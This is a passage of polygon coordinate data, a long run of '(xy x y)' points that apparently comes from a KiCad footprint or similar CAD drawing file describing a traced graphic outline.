-6.941346) (xy 0.885233 -6.936864) (xy 1.186201 -6.925478) (xy 1.473869 -6.908763) (xy 1.717285 -6.888293) (xy 1.778 -6.881542) (xy 1.99729 -6.851003) (xy 2.208675 -6.81427) (xy 2.384421 -6.77654) (xy 2.4765 -6.750601) (xy 2.705096 -6.65343) (xy 2.900538 -6.534229) (xy 3.054255 -6.402616) (xy 3.157678 -6.26821) (xy 3.202235 -6.140632) (xy 3.179357 -6.029499) (xy 3.151076 -5.993457) (xy 3.118454 -5.96892) (xy 3.068967 -5.950864) (xy 2.991075 -5.938516) (xy 2.873236 -5.931104) (xy 2.703912 -5.927854) (xy 2.47156 -5.927993) (xy 2.208078 -5.930281) (xy 1.911834 -5.932747) (xy 1.689146 -5.932536) (xy 1.528928 -5.928912) (xy 1.420092 -5.921143) (xy 1.351552 -5.908494) (xy 1.31222 -5.890231) (xy 1.293456 -5.869723) (xy 1.274465 -5.784831) (xy 1.309283 -5.704563) (xy 1.424757 -5.506781) (xy 1.535092 -5.293289) (xy 1.634392 -5.078649) (xy 1.71676 -4.87742) (xy 1.776297 -4.704164) (xy 1.807107 -4.57344) (xy 1.803292 -4.499811) (xy 1.799348 -4.494571) (xy 1.751082 -4.490902) (xy 1.639693 -4.498516) (xy 1.485732 -4.515783) (xy 1.419159 -4.524702) (xy 1.218105 -4.548772) (xy 0.97058 -4.572491) (xy 0.714726 -4.592413) (xy 0.573674 -4.601079) (xy 0.088154 -4.627098) (xy 0.087795 -5.131562) (xy 0.086628 -5.361638) (xy 0.081689 -5.543522) (xy 0.070255 -5.701681) (xy 0.049606 -5.860581) (xy 0.017021 -6.044688) (xy -0.030222 -6.278468) (xy -0.050613 -6.376032) (xy -0.085841 -6.562129) (xy -0.109099 -6.722018) (xy -0.117712 -6.834673) (xy -0.411013 -6.834673) (xy -0.407551 -6.79907) (xy -0.377819 -6.659307) (xy -0.34677 -6.533415) (xy -0.272088 -6.207787) (xy -0.220456 -5.904374) (xy -0.188547 -5.594094) (xy -0.173037 -5.24787) (xy -0.170172 -4.989279) (xy -0.169301 -4.746792) (xy -0.163269 -4.576295) (xy -0.145722 -4.465121) (xy -0.110303 -4.400603) (xy -0.050656 -4.370072) (xy 0.039576 -4.360862) (xy 0.145415 -4.360334) (xy 0.326238 -4.360334) (xy 0.310998 -4.15925) (xy 0.278305 -3.732079) (xy 0.247124 -3.332718) (xy 0.218229 -2.970625) (xy 0.192394 -2.655259) (xy 0.170396 -2.396076) (xy 0.153008 -2.202534) (xy 0.141113 -2.085031) (xy 0.119328 -1.897047) (xy 0.385396 -1.897047) (xy 0.388255 -1.977137) (xy 0.394971 -2.021417) (xy 0.405475 -2.110644) (xy 0.420643 -2.269151) (xy 0.439167 -2.481765) (xy 0.459737 -2.733308) (xy 0.481047 -3.008607) (xy 0.487149 -3.090334) (xy 0.514144 -3.4515) (xy 0.5364 -3.73704) (xy 0.555092 -3.955787) (xy 0.571398 -4.116576) (xy 0.586493 -4.22824) (xy 0.601554 -4.299612) (xy 0.617756 -4.339525) (xy 0.636277 -4.356815) (xy 0.656262 -4.360334) (xy 0.726564 -4.334475) (xy 0.739899 -4.319512) (xy 0.744635 -4.268186) (xy 0.745543 -4.143365) (xy 0.742862 -3.956123) (xy 0.736828 -3.717534) (xy 0.727681 -3.43867) (xy 0.715656 -3.130607) (xy 0.713108 -3.070679) (xy 0.661088 -1.862667) (xy 0.515633 -1.862667) (xy 0.421586 -1.867138) (xy 0.385396 -1.897047) (xy 0.119328 -1.897047) (xy 0.11537 -1.862895) (xy -0.482065 -1.884248) (xy -1.086633 -1.905061) (xy -1.659464 -1.923216) (xy -2.195309 -1.938625) (xy -2.688919 -1.9512) (xy -3.135046 -1.960855) (xy -3.528439 -1.9675) (xy -3.863849 -1.971049) (xy -4.136027 -1.971414) (xy -4.339723 -1.968507) (xy -4.469689 -1.96224) (xy -4.520675 -1.952526) (xy -4.521148 -1.951724) (xy -4.571096 -1.909343) (xy -4.59846 -1.905) (xy -4.629961 -1.890493) (xy -4.644733 -1.836248) (xy -4.644748 -1.778) (xy -4.357923 -1.778) (xy -4.318577 -1.783197) (xy -4.207479 -1.785163) (xy -4.037479 -1.783996) (xy -3.821425 -1.779794) (xy -3.572167 -1.772657) (xy -3.545468 -1.771771) (xy -3.347113 -1.765645) (xy -3.075225 -1.758062) (xy -2.740919 -1.749295) (xy -2.355311 -1.739615) (xy -1.929519 -1.729294) (xy -1.474656 -1.718603) (xy -1.00184 -1.707813) (xy -0.522185 -1.697197) (xy -0.275167 -1.691865) (xy 0.826165 -1.673003) (xy 1.940579 -1.662939) (xy 3.051864 -1.661567) (xy 4.143807 -1.668778) (xy 5.200194 -1.684465) (xy 6.204813 -1.708521) (xy 7.14145 -1.740838) (xy 7.145812 -1.741016) (xy 7.449987 -1.752546) (xy 7.725841 -1.761406) (xy 7.962255 -1.76737) (xy 8.148113 -1.770208) (xy 8.272297 -1.769691) (xy 8.323691 -1.765592) (xy 8.32422 -1.765224) (xy 8.305805 -1.726718) (xy 8.244129 -1.625336) (xy 8.143774 -1.468059) (xy 8.00932 -1.261864) (xy 7.845349 -1.013731) (xy 7.656443 -0.730639) (xy 7.447183 -0.419566) (xy 7.240945 -0.115134) (xy 6.134907 1.512194) (xy 5.53337 1.581878) (xy 5.160918 1.6241) (xy 4.830525 1.658978) (xy 4.528208 1.6872) (xy 4.239986 1.709455) (xy 3.951877 1.726429) (xy 3.649899 1.73881) (xy 3.32007 1.747287) (xy 2.948408 1.752546) (xy 2.520932 1.755277) (xy 2.023659 1.756165) (xy 1.989667 1.756175) (xy 1.395995 1.754602) (xy 0.871361 1.749062) (xy 0.400192 1.738761) (xy -0.033082 1.722906) (xy -0.44403 1.700704) (xy -0.848225 1.671362) (xy -1.261236 1.634086) (xy -1.698634 1.588084) (xy -2.008876 1.552481) (xy -2.430252 1.502833) (xy -3.39283 -0.127) (xy -3.592029 -0.464649) (xy -3.777414 -0.779591) (xy -3.94465 -1.064407) (xy -4.089399 -1.31168) (xy -4.207325 -1.513991) (xy -4.294092 -1.663922) (xy -4.345364 -1.754055) (xy -4.357923 -1.778) (xy -4.644748 -1.778) (xy -4.644762 -1.726179) (xy -4.636363 -1.598084) (xy -4.628401 -1.470037) (xy -4.618548 -1.271763) (xy -4.607322 -1.017668) (xy -4.595241 -0.722157) (xy -4.582824 -0.399637) (xy -4.570587 -0.064512) (xy -4.55905 0.268812) (xy -4.548731 0.585929) (xy -4.540147 0.872433) (xy -4.533816 1.11392) (xy -4.530257 1.295983) (xy -4.529667 1.368829) (xy -4.529667 1.619574) (xy -4.751917 1.591317) (xy -4.946659 1.565147) (xy -5.181219 1.531398) (xy -5.442634 1.492169) (xy -5.717941 1.449561) (xy -5.994178 1.405673) (xy -6.258382 1.362605) (xy -6.497592 1.322458) (xy -6.698844 1.287331) (xy -6.849176 1.259325) (xy -6.935626 1.24054) (xy -6.95113 1.235022) (xy -6.960547 1.179975) (xy -6.949666 1.074505) (xy -6.939274 1.02187) (xy -6.919068 0.892964) (xy -6.936187 0.805931) (xy -7.003282 0.747652) (xy -7.133005 0.705006) (xy -7.272179 0.676635) (xy -7.687722 0.57906) (xy -8.141373 0.434252) (xy -8.607652 0.250876) (xy -8.862062 0.135864) (xy -9.067553 0.039318) (xy -9.211958 -0.024413) (xy -9.310293 -0.05962) (xy -9.377575 -0.070595) (xy -9.42882 -0.061628) (xy -9.474983 -0.039303) (xy -9.564082 0.048349) (xy -9.650262 0.210714) (xy -9.734075 0.449702) (xy -9.816072 0.767225) (xy -9.896806 1.165192) (xy -9.976827 1.645514) (xy -9.993565 1.756833) (xy -10.046107 2.172447) (xy -10.069729 2.519885) (xy -10.069602 2.527125) (xy -9.811989 2.527125) (xy -9.796235 2.291758) (xy -9.767121 2.018342) (xy -9.72726 1.722387) (xy -9.679268 1.419401) (xy -9.62576 1.124891) (xy -9.569351 0.854365) (xy -9.512656 0.623332) (xy -9.458291 0.4473) (xy -9.413855 0.34925) (xy -9.346552 0.277521) (xy -9.28969 0.254) (xy -9.226121 0.271461) (xy -9.106179 0.318517) (xy -8.949356 0.387173) (xy -8.835582 0.440215) (xy -8.398813 0.626712) (xy -7.944478 0.781125) (xy -7.509906 0.890937) (xy -7.464798 0.899778) (xy -7.190191 0.95187) (xy -7.21705 1.079185) (xy -7.313871 1.59863) (xy -7.316804 1.620706) (xy -7.065777 1.620706) (xy -7.030224 1.554957) (xy -6.972725 1.524) (xy -6.915526 1.530414) (xy -6.787781 1.548356) (xy -6.602533 1.575875) (xy -6.372823 1.611022) (xy -6.111693 1.651845) (xy -6.008313 1.668222) (xy -5.720392 1.713273) (xy -5.441737 1.755554) (xy -5.189949 1.792493) (xy -4.982631 1.821519) (xy -4.837384 1.840061) (xy -4.815417 1.842487) (xy -4.529667 1.87253) (xy -4.529667 2.015765) (xy -4.543796 2.118889) (xy -4.581533 2.158154) (xy -4.582583 2.158158) (xy -4.645215 2.150056) (xy -4.775481 2.128169) (xy -4.960739 2.094947) (xy -5.188344 2.05284) (xy -5.445653 2.004298) (xy -5.720022 1.951774) (xy -5.998807 1.897717) (xy -6.269364 1.844578) (xy -6.51905 1.794807) (xy -6.735221 1.750856) (xy -6.905232 1.715175) (xy -7.01644 1.690214) (xy -7.056025 1.678753) (xy -7.065777 1.620706) (xy -7.316804 1.620706) (xy -7.377385 2.076598) (xy -7.394473 2.276226) (xy -7.408096 2.459387) (xy -7.421695 2.572825) (xy -7.43994 2.631352) (xy -7.467504 2.649782) (xy -7.509058 2.642926) (xy -7.510022 2.642645) (xy -7.662299 2.576681) (xy -7.85469 2.460623) (xy -8.069627 2.306351) (xy -8.289539 2.125748) (xy -8.33762 2.082958) (xy -8.504354 1.939915) (xy -8.624248 1.860753) (xy -8.706902 1.846239) (xy -8.761914 1.897138) (xy -8.798881 2.014219) (xy -8.817076 2.121265) (xy -8.849541 2.315023) (xy -8.894645 2.542322) (xy -8.947626 2.783133) (xy -9.003723 3.01743) (xy -9.058173 3.225184) (xy -9.106215 3.386369) (xy -9.137941 3.470715) (xy -9.221748 3.590383) (xy -9.318841 3.635271) (xy -9.422576 3.612887) (xy -9.526313 3.53074) (xy -9.623411 3.396339) (xy -9.707227 3.217192) (xy -9.77112 3.000807) (xy -9.808448 2.754693) (xy -9.811766 2.708937) (xy -9.811989 2.527125) (xy -10.069602 2.527125) (xy -10.064594 2.810484) (xy -10.030869 3.055581) (xy -10.01348 3.128462) (xy -9.922308 3.380513) (xy -9.796702 3.599979) (xy -9.647633 3.774247) (xy -9.486069 3.890704) (xy -9.322979 3.936737) (xy -9.310321 3.937) (xy -9.169436 3.906753) (xy -9.044904 3.813134) (xy -8.934378 3.651821) (xy -8.835506 3.418497) (xy -8.745941 3.108839) (xy -8.671577 2.762524) (xy -8.63405 2.568218) (xy -8.601672 2.406691) (xy -8.57789 2.29474) (xy -8.566155 2.24916) (xy -8.566137 2.249134) (xy -8.532008 2.267665) (xy -8.45127 2.330871) (xy -8.339716 2.426209) (xy -8.309857 2.452705) (xy -8.086143 2.626311) (xy -7.836941 2.776567) (xy -7.589846 2.888589) (xy -7.401395 2.942755) (xy -7.310956 2.952217) (xy -7.246706 2.933817) (xy -7.203017 2.87575) (xy -7.174263 2.766209) (xy -7.154818 2.59339) (xy -7.142006 2.398521) (xy -7.130663 2.220798) (xy -7.119224 2.07828) (xy -7.109324 1.989692) (xy -7.104577 1.96997) (xy -7.061152 1.974471) (xy -6.944721 1.992891) (xy -6.765475 2.023448) (xy -6.533605 2.064358) (xy -6.259305 2.113836) (xy -5.952764 2.170098) (xy -5.812597 2.196115) (xy -5.449245 2.264254) (xy -5.160638 2.319771) (xy -4.938152 2.364804) (xy -4.773161 2.401493) (xy -4.65704 2.431976) (xy -4.581165 2.458393) (xy -4.53691 2.482882) (xy -4.515652 2.507584) (xy -4.511425 2.518833) (xy -4.50187 2.599972) (xy -4.494899 2.757474) (xy -4.490378 2.983083) (xy -4.488175 3.26854) (xy -4.488157 3.605586) (xy -4.490191 3.985962) (xy -4.494145 4.401411) (xy -4.499884 4.843674) (xy -4.507278 5.304491) (xy -4.516192 5.775605) (xy -4.526494 6.248758) (xy -4.538051 6.71569) (xy -4.55073 7.168144) (xy -4.564399 7.59786) (xy -4.578924 7.996581) (xy -4.594174 8.356047) (xy -4.610014 8.668001) (xy -4.61045 8.675719) (xy -4.624599 8.933124) (xy -4.628358 9.120597) (xy -4.625499 9.147442) (xy -4.44036 9.147442) (xy -4.436116 9.011076) (xy -4.426797 8.85825) (xy -4.402817 8.434556) (xy -4.381859 7.939898) (xy -4.363928 7.384177) (xy -4.349025 6.777295) (xy -4.337153 6.129155) (xy -4.328313 5.449658) (xy -4.322509 4.748706) (xy -4.319742 4.036202) (xy -4.320015 3.322047) (xy -4.32333 2.616145) (xy -4.329689 1.928395) (xy -4.339095 1.268702) (xy -4.351549 0.646966) (xy -4.367055 0.07309) (xy -4.385615 -0.443024) (xy -4.40723 -0.891474) (xy -4.424472 -1.163901) (xy -4.432411 -1.330169) (xy -4.428651 -1.433103) (xy -4.413657 -1.463218) (xy -4.409858 -1.460235) (xy -4.380628 -1.415644) (xy -4.313394 -1.305901) (xy -4.212889 -1.138946) (xy -4.083844 -0.922716) (xy -3.930989 -0.665151) (xy -3.759057 -0.374189) (xy -3.57278 -0.057768) (xy -3.493607 0.077057) (xy -3.301937 0.405424) (xy -3.122936 0.715423) (xy -2.961396 0.998506) (xy -2.822107 1.246129) (xy -2.709863 1.449744) (xy -2.629455 1.600806) (xy -2.585676 1.690769) (xy -2.579712 1.70689) (xy -2.571568 1.747932) (xy -2.368913 1.747932) (xy -2.357737 1.704136) (xy -2.315153 1.704748) (xy -2.302764 1.708355) (xy -2.238337 1.719291) (xy -2.102995 1.73609) (xy -1.910174 1.757299) (xy -1.673308 1.781466) (xy -1.405834 1.807139) (xy -1.291167 1.817696) (xy -0.370498 1.893393) (xy 0.485377 1.946438) (xy 1.293115 1.97728) (xy 2.069378 1.986367) (xy 2.830824 1.974148) (xy 3.4925 1.946627) (xy 3.853319 1.925112) (xy 4.237152 1.898008) (xy 4.625621 1.866939) (xy 5.000351 1.833531) (xy 5.342965 1.799411) (xy 5.635084 1.766203) (xy 5.830857 1.739772) (xy 5.957402 1.723528) (xy 6.044207 1.717741) (xy 6.066893 1.720671) (xy 6.067865 1.765977) (xy 6.058993 1.876598) (xy 6.041978 2.03397) (xy 6.027055 2.154892) (xy 5.964373 2.688505) (xy 5.914471 3.224834) (xy 5.876519 3.779365) (xy 5.849684 4.367587) (xy 5.833134 5.004987) (xy 5.827043 5.607781) (xy 6.015822 5.607781) (xy 6.036675 4.641466) (xy 6.082204 3.699884) (xy 6.152268 2.802514) (xy 6.235618 2.053142) (xy 6.290398 1.629833) (xy 7.362979 0.051475) (xy 7.584021 -0.273049) (xy 7.790316 -0.574474) (xy 7.977062 -0.845887) (xy 8.139453 -1.080373) (xy 8.272685 -1.271017) (xy 8.371955 -1.410904) (xy 8.432459 -1.49312) (xy 8.449729 -1.512715) (xy 8.451921 -1.468634) (xy 8.451883 -1.349485) (xy 8.449776 -1.164832) (xy 8.445758 -0.92424) (xy 8.439988 -0.637273) (xy 8.432625 -0.313498) (xy 8.4242 0.02331) (xy 8.413548 0.500035) (xy 8.405031 1.024539) (xy 8.398588 1.588436) (xy 8.394157 2.183337) (xy 8.391679 2.800857) (xy 8.391091 3.432608) (xy 8.392333 4.070202) (xy 8.395345 4.705252) (xy 8.400065 5.329372) (xy 8.403391 5.645402) (xy 8.593667 5.645402) (xy 8.596607 5.52723) (xy 8.614439 5.473685) (xy 8.660681 5.464737) (xy 8.710083 5.472906) (xy 8.781766 5.484343) (xy 8.925239 5.505259) (xy 9.128368 5.533958) (xy 9.181878 5.541384) (xy 11.641196 5.541384) (xy 11.66495 5.505978) (xy 11.736299 5.454498) (xy 11.840937 5.396548) (xy 11.942773 5.350519) (xy 12.0015 5.334478) (xy 11.994749 5.353634) (xy 11.930602 5.40255) (xy 11.8745 5.438729) (xy 11.757375 5.505044) (xy 11.675324 5.540637) (xy 11.641196 5.541384) (xy 9.181878 5.541384) (xy 9.365261 5.566833) (xy 11.557 5.566833) (xy 11.578167 5.545666) (xy 11.599333 5.566833) (xy 11.578167 5.588) (xy 11.557 5.566833) (xy 9.365261 5.566833) (xy 9.379018 5.568742) (xy 9.665053 5.607915) (xy 9.974339 5.64978) (xy 9.990667 5.651976) (xy 10.355446 5.702078) (xy 10.64389 5.744256) (xy 10.863808 5.779958) (xy 11.02301 5.810636) (xy 11.129307 5.837738) (xy 11.190509 5.862714) (xy 11.209575 5.878196) (xy 11.28446 5.921945) (xy 11.578167 5.921945) (xy 11.581418 5.912911) (xy 11.654495 5.889296) (xy 11.784557 5.854814) (xy 11.937242 5.818129) (xy 12.123091 5.774429) (xy 12.279272 5.736367) (xy 12.386675 5.70868) (xy 12.424076 5.697428) (xy 12.494229 5.681094) (xy 12.576041 5.676597) (xy 12.636326 5.683664) (xy 12.645198 5.699246) (xy 12.594504 5.718368) (xy 12.480367 5.748285) (xy 12.322683 5.784843) (xy 12.141345 5.82389) (xy 11.956249 5.861275) (xy 11.787289 5.892844) (xy 11.654359 5.914447) (xy 11.578167 5.921945) (xy 11.28446 5.921945) (xy 11.298053 5.929886) (xy 11.374258 5.933443) (xy 11.45216 5.933381) (xy 11.468468 5.973234) (xy 11.462635 6.001513) (xy 11.449918 6.084859) (xy 11.469916 6.143624) (xy 11.533672 6.182223) (xy 11.652227 6.205067) (xy 11.836626 6.21657) (xy 12.009894 6.220226) (xy 12.2052 6.223824) (xy 12.366779 6.228881) (xy 12.477452 6.234716) (xy 12.519892 6.240448) (xy 12.485305 6.247464) (xy 12.380813 6.257249) (xy 12.221089 6.268677) (xy 12.020806 6.280621) (xy 11.942626 6.284778) (xy 11.691631 6.299861) (xy 11.514929 6.316079) (xy 11.402146 6.334955) (xy 11.34291 6.358013) (xy 11.328572 6.374951) (xy 11.316933 6.461621) (xy 11.366167 6.521401) (xy 11.484878 6.560462) (xy 11.612458 6.578631) (xy 11.797261 6.601728) (xy 12.003052 6.633604) (xy 12.213991 6.671009) (xy 12.414237 6.710698) (xy 12.587948 6.749421) (xy 12.719284 6.783932) (xy 12.792403 6.810984) (xy 12.801656 6.822425) (xy 12.734837 6.855022) (xy 12.597878 6.861752) (xy 12.400858 6.843828) (xy 12.153858 6.802461) (xy 11.866956 6.738867) (xy 11.659298 6.684939) (xy 11.437489 6.622426) (xy 11.243051 6.564386) (xy 11.091451 6.515687) (xy 10.998152 6.481196) (xy 10.977749 6.47044) (xy 10.913257 6.462259) (xy 10.840166 6.516501) (xy 10.767432 6.605511) (xy 10.763288 6.67177) (xy 10.813846 6.729074) (xy 10.873304 6.813652) (xy 10.930434 6.9512) (xy 10.975563 7.110339) (xy 10.999015 7.259692) (xy 10.998897 7.329219) (xy 10.977682 7.44219) (xy 10.943495 7.475952) (xy 10.895555 7.429601) (xy 10.83308 7.302233) (xy 10.755289 7.092945) (xy 10.730437 7.018875) (xy 10.660526 6.816082) (xy 10.590976 6.630397) (xy 10.53043 6.484023) (xy 10.491799 6.40592) (xy 10.418677 6.313778) (xy 10.313116 6.235631) (xy 10.164321 6.167308) (xy 9.961497 6.104642) (xy 9.693851 6.043462) (xy 9.419167 5.991608) (xy 9.190158 5.950865) (xy 8.984683 5.914017) (xy 8.820047 5.884188) (xy 8.713555 5.864505) (xy 8.688917 5.859729) (xy 8.629667 5.835891) (xy 8.601555 5.779986) (xy 8.593754 5.667655) (xy 8.593667 5.645402) (xy 8.403391 5.645402) (xy 8.406432 5.934173) (xy 8.414385 6.51127) (xy 8.423864 7.052273) (xy 8.434808 7.548797) (xy 8.447156 7.992454) (xy 8.460846 8.374857) (xy 8.475818 8.687618) (xy 8.48852 8.880046) (xy 8.497709 9.051406) (xy 8.491331 9.153284) (xy 8.468069 9.199654) (xy 8.457906 9.204737) (xy 8.395325 9.222684) (xy 8.271751 9.256941) (xy 8.107939 9.301782) (xy 8.001 9.330833) (xy 7.721023 9.422747) (xy 7.383587 9.561372) (xy 6.99886 9.742476) (xy 6.932083 9.775874) (xy 6.717194 9.883581) (xy 6.531103 9.975683) (xy 6.385833 10.046327) (xy 6.293407 10.089657) (xy 6.265333 10.100532) (xy 6.260941 10.056879) (xy 6.248739 9.942607) (xy 6.230194 9.771256) (xy 6.206769 9.556363) (xy 6.182054 9.3308) (xy 6.102763 8.460339) (xy 6.048723 7.536697) (xy 6.019791 6.579351) (xy 6.015822 5.607781) (xy 5.827043 5.607781) (xy 5.826039 5.707052) (xy 5.825638 5.9055) (xy 5.826914 6.314834) (xy 5.830944 6.720754) (xy 5.837402 7.108929) (xy 5.845964 7.465026) (xy 5.856302 7.774712) (xy 5.868093 8.023657) (xy 5.876628 8.149166) (xy 5.903637 8.467137) (xy 5.932847 8.788565) (xy 5.962944 9.100957) (xy 5.992613 9.391824) (xy 6.02054 9.648673) (xy 6.045409 9.859014) (xy 6.065906 10.010354) (xy 6.080716 10.090204) (xy 6.081073 10.091413) (xy 6.087699 10.138712) (xy 6.05622 10.156352) (xy 5.967823 10.15003) (xy 5.9133 10.142216) (xy 5.635503 10.102841) (xy 5.333962 10.063926) (xy 5.032747 10.028262) (xy 4.755929 9.99864) (xy 4.527578 9.977849) (xy 4.445 9.971992) (xy 3.969171 9.943348) (xy 3.565418 9.920096) (xy 3.221357 9.901721) (xy 2.924603 9.887711) (xy 2.662771 9.877551) (xy 2.423476 9.870729) (xy 2.194336 9.866729) (xy 1.962963 9.86504) (xy 1.862667 9.864896) (xy 1.140671 9.875011) (xy 0.388888 9.904197) (xy -0.365214 9.950718) (xy -1.094166 10.012836) (xy -1.770498 10.088814) (xy -1.856994 10.100134) (xy -2.048431 10.124269) (xy -2.206476 10.141565) (xy -2.313873 10.150311) (xy -2.353127 10.149317) (xy -2.353369 10.104375) (xy -2.344245 9.99014) (xy -2.327193 9.821294) (xy -2.303645 9.61252) (xy -2.287761 9.480422) (xy -2.23449 9.024339) (xy -2.191469 8.600257) (xy -2.157782 8.190967) (xy -2.132509 7.779259) (xy -2.114733 7.347925) (xy -2.103536 6.879754) (xy -2.097999 6.357536) (xy -2.097016 5.9055) (xy -2.106185 5.005315) (xy -2.132893 4.179572) (xy -2.177681 3.419766) (xy -2.241092 2.717395) (xy -2.32367 2.063956) (xy -2.355582 1.855339) (xy -2.368913 1.747932) (xy -2.571568 1.747932) (xy -2.558387 1.814351) (xy -2.531976 1.992676) (xy -2.50192 2.228318) (xy -2.46966 2.507726) (xy -2.436636 2.817351) (xy -2.404292 3.143644) (xy -2.374067 3.473056) (xy -2.347404 3.792036) (xy -2.325744 4.087036) (xy -2.324459 4.106333) (xy -2.310269 4.392091) (xy -2.300398 4.743077) (xy -2.29465 5.145114) (xy -2.292833 5.584027) (xy -2.294752 6.045637) (xy -2.300212 6.515768) (xy -2.309021 6.980243) (xy -2.320982 7.424885) (xy -2.335903 7.835518) (xy -2.353589 8.197965) (xy -2.373846 8.498049) (xy -2.386494 8.636) (xy -2.431407 9.05596) (xy -2.470154 9.396363) (xy -2.503425 9.662041) (xy -2.531909 9.857827) (xy -2.556295 9.988552) (xy -2.577272 10.059048) (xy -2.591798 10.075333) (xy -2.641615 10.055754) (xy -2.749356 10.002393) (xy -2.89934 9.923316) (xy -3.07589 9.826589) (xy -3.082428 9.822943) (xy -3.291755 9.712024) (xy -3.520875 9.600332) (xy -3.753523 9.494763) (xy -3.973432 9.402211) (xy -4.164337 9.329571) (xy -4.309971 9.283741) (xy -4.384471 9.271) (xy -4.416085 9.262304) (xy -4.434199 9.226151) (xy -4.44036 9.147442) (xy -4.625499 9.147442) (xy -4.614275 9.25282) (xy -4.574898 9.344477) (xy -4.502778 9.410251) (xy -4.390462 9.464824) (xy -4.230498 9.52288) (xy -4.169833 9.543963) (xy -3.852189 9.668705) (xy -3.497793 9.831487) (xy -3.136322 10.017855) (xy -2.804871 10.208802) (xy -2.518833 10.384043) (xy -2.010833 10.314586) (xy -1.639783 10.265075) (xy -1.305058 10.223663) (xy -0.993912 10.189638) (xy -0.693597 10.16229) (xy -0.391369 10.140908) (xy -0.074481 10.124781) (xy 0.269814 10.113198) (xy 0.654262 10.105449) (xy 1.09161 10.100822) (xy 1.594603 10.098608) (xy 1.869722 10.098187) (xy 2.270961 10.098504) (xy 2.646207 10.100074) (xy 2.986984 10.102769) (xy 3.284818 10.106463) (xy 3.531234 10.11103) (xy 3.717757 10.116343) (xy 3.835912 10.122274) (xy 3.876968 10.12819) (xy 3.893674 10.180698) (xy 3.905059 10.239802) (xy 4.191 10.239802) (xy 4.202466 10.186684) (xy 4.251783 10.165669) (xy 4.36133 10.167683) (xy 4.367748 10.168149) (xy 4.544495 10.181166) (xy 4.667124 10.8585) (xy 4.73041 11.192753) (xy 4.789657 11.454532) (xy 4.852249 11.655257) (xy 4.925564 11.806347) (xy 5.016984 11.919221) (xy 5.13389 12.005299) (xy 5.283664 12.076001) (xy 5.473685 12.142745) (xy 5.503333 12.152237) (xy 5.743347 12.229277) (xy 5.913156 12.286741) (xy 6.023469 12.329985) (xy 6.084993 12.364366) (xy 6.108436 12.395241) (xy 6.104506 12.427967) (xy 6.094847 12.448154) (xy 6.043054 12.502618) (xy 5.954513 12.509195) (xy 5.915249 12.503056) (xy 5.784978 12.468991) (xy 5.638578 12.416116) (xy 5.502737 12.355867) (xy 5.404147 12.299681) (xy 5.372516 12.27049) (xy 5.315301 12.244879) (xy 5.233165 12.263957) (xy 5.163971 12.315608) (xy 5.148598 12.342146) (xy 5.145325 12.425156) (xy 5.168964 12.520451) (xy 5.247543 12.750984) (xy 5.323816 13.018168) (xy 5.392651 13.299145) (xy 5.448916 13.571058) (xy 5.487481 13.81105) (xy 5.503213 13.996263) (xy 5.503333 14.009803) (xy 5.49898 14.158816) (xy 5.487276 14.256629) (xy 5.470253 14.287864) (xy 5.466919 14.285383) (xy 5.438653 14.219975) (xy 5.404101 14.089221) (xy 5.3667 13.911879) (xy 5.329888 13.706711) (xy 5.297101 13.492476) (xy 5.271777 13.287934) (xy 5.260013 13.156037) (xy 5.239043 12.963816) (xy 5.203903 12.84617) (xy 5.147904 12.79334) (xy 5.064357 12.795566) (xy 5.022464 12.809402) (xy 4.995699 12.82972) (xy 4.976362 12.875182) (xy 4.963088 12.958164) (xy 4.954515 13.09104) (xy 4.949277 13.286185) (xy 4.946545 13.498279) (xy 4.94349 13.737367) (xy 4.939473 13.896806) (xy 4.934009 13.981612) (xy 4.926613 13.996804) (xy 4.916802 13.947397) (xy 4.909159 13.885333) (xy 4.892396 13.695148) (xy 4.879333 13.471887) (xy 4.873281 13.284936) (xy 4.868398 13.118262) (xy 4.856643 13.017218) (xy 4.832966 12.962787) (xy 4.792316 12.93595) (xy 4.779405 12.931481) (xy 4.692847 12.92407) (xy 4.652838 12.940895) (xy 4.63087 12.994532) (xy 4.597449 13.114601) (xy 4.556803 13.28433) (xy 4.513161 13.486949) (xy 4.504999 13.527183) (xy 4.461188 13.734388) (xy 4.41949 13.912126) (xy 4.384163 14.043524) (xy 4.359463 14.111711) (xy 4.356399 14.11605) (xy 4.33155 14.133541) (xy 4.321576 14.113188) (xy 4.327833 14.045778) (xy 4.351673 13.922097) (xy 4.394453 13.732931) (xy 4.442168 13.532633) (xy 4.509 13.253837) (xy 4.556948 13.046208) (xy 4.587202 12.898659) (xy 4.600952 12.800104) (xy 4.599385 12.739457) (xy 4.583692 12.705632) (xy 4.555061 12.687541) (xy 4.533608 12.680084) (xy 4.475115 12.643939) (xy 4.449385 12.568351) (xy 4.445 12.473741) (xy 4.439631 12.380908) (xy 4.424585 12.218715) (xy 4.401449 12.001717) (xy 4.371812 11.74447) (xy 4.337261 11.461527) (xy 4.318 11.309997) (xy 4.281902 11.026368) (xy 4.249792 10.767367) (xy 4.22321 10.545956) (xy 4.203694 10.375097) (xy 4.192781 10.267754) (xy 4.191 10.239802) (xy 3.905059 10.239802) (xy 3.917448 10.304114) (xy 3.946624 10.485132) (xy 3.979536 10.710446) (xy 4.014519 10.96675) (xy 4.049908 11.240737) (xy 4.084036 11.5191) (xy 4.115238 11.788534) (xy 4.141848 12.035731) (xy 4.162202 12.247387) (xy 4.174633 12.410193) (xy 4.177476 12.510843) (xy 4.176701 12.522811) (xy 4.1136 12.736614) (xy 4.032383 12.862332) (xy 3.929813 13.005476) (xy 3.833032 13.164385) (xy 3.813945 13.200267) (xy 3.760459 13.335936) (xy 3.720627 13.487313) (xy 3.990535 13.487313) (xy 3.997032 13.442752) (xy 4.033427 13.354) (xy 4.08614 13.249517) (xy 4.141594 13.157761) (xy 4.159141 13.133916) (xy 4.208039 13.082014) (xy 4.215571 13.098285) (xy 4.182876 13.17768) (xy 4.123299 13.292879) (xy 4.058505 13.4041) (xy 4.009502 13.473876) (xy 3.990535 13.487313) (xy 3.720627 13.487313) (xy 3.71636 13.503528) (xy 3.68527 13.678951) (xy 3.670811 13.838111) (xy 3.676604 13.956915) (xy 3.693466 14.00175) (xy 3.779213 14.052247) (xy 3.883757 14.032944) (xy 3.986723 13.949103) (xy 4.008654 13.920367) (xy 4.101474 13.787531) (xy 4.09332 14.119576) (xy 4.09077 14.28689) (xy 4.09705 14.390681) (xy 4.117875 14.452039) (xy 4.158961 14.492049) (xy 4.201218 14.517727) (xy 4.305523 14.555635) (xy 4.397992 14.532976) (xy 4.494339 14.442492) (xy 4.561417 14.351351) (xy 4.656667 14.211479) (xy 4.656667 14.360723) (xy 4.684042 14.501218) (xy 4.75543 14.580473) (xy 4.854723 14.596864) (xy 4.965814 14.548766) (xy 5.072596 14.434555) (xy 5.091467 14.404571) (xy 5.183133 14.24921) (xy 